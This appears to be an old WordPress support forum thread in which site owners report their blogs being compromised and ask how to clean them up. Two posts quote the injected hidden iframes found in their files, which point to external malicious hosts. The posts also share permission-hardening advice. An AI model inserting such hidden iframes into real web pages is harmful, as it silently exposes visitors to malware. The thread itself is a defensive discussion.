The Support Forums will be in read-only mode for a scheduled maintenance window on 01 September 2016 14:00 UTC - 20:00 UTC. More information.

blog exploit - megacount.net pop up (6 posts)

  1. fuzzys
    Posted 9 years ago #

    i run 2.0.4 and i am a mac user.

    i have an issue with my blog, and i don't know what is causing it. lately some people have been telling me my blog loads a trojan. it wasnt until a week ago that it affected safari.

    a megacount.net popup loads and crashes safari altogether. i have asked my webhost and this is the reply:

    We could not find any popup when we went into the site. Perhaps you
    have removed it. [not sure if popup appears on pcs]

    The attacked is based on XSS and HTML injection where the attacker
    can insert malicious code into a WordPress powered website. This
    issue is known to WordPress.

    You may refer to http://wordpress.org/support/topic/30721 for more

    however the post seems to refer to an older version of wordpress.. and im not super tech savvy so i am a bit lost.

    does anyone have any idea what the exploit is and how to fix it?

  2. fuzzys
    Posted 9 years ago #

    after managing to stop loading just before it calls for a popup i found some dodgy code on my index.php as follows after the </html> tag as follows

    <iframe src="http://gonick.net/agt/out.php?s_id=1" width=0 height=0></iframe>

    removing it seems to have fixed the problem. now how do i stop it from happening again? seems that something modified my original code. but i dont know how it happened.

  3. cnymike
    Posted 9 years ago #

    My WP site was just exploited as well. A slightly different code, but similar in many ways. I also had iFrame code inserted into files that were not with correct permissions. They were world writeable and according to my host, a malicious php script found the writeable files and was able to insert code into the files.

    In my case, the code that was inserted was <iframe width="1" height="1" src="http://tusak.biz/kav/index2.php" style="border: 0;"></iframe>

    Directories should be given 755 permissions and files 644 permissions to make them non-world writeable. that's according to my webhost.

  4. SizzleChest
    Posted 9 years ago #

    it's not just limited to blogs. I've had sites with no scripts installed on the site and they've been hit as well. I think it's a bot that tries to crack in via ftp

  5. Kafkaesqui

    Posted 9 years ago #

    "Directories should be given 755 permissions and files 644 permissions to make them non-world writeable."

    Just wanted to highlight that sentence...

  6. hristov
    Posted 9 years ago #

    So how do you repair the exploit? I've done what it says here: http://wordpress.org/support/topic/30721 but that hasn't helped. I'm also checking all my chmods, but how do I remove the existing exploit?

Topic Closed

This topic has been closed to new replies.

About this Topic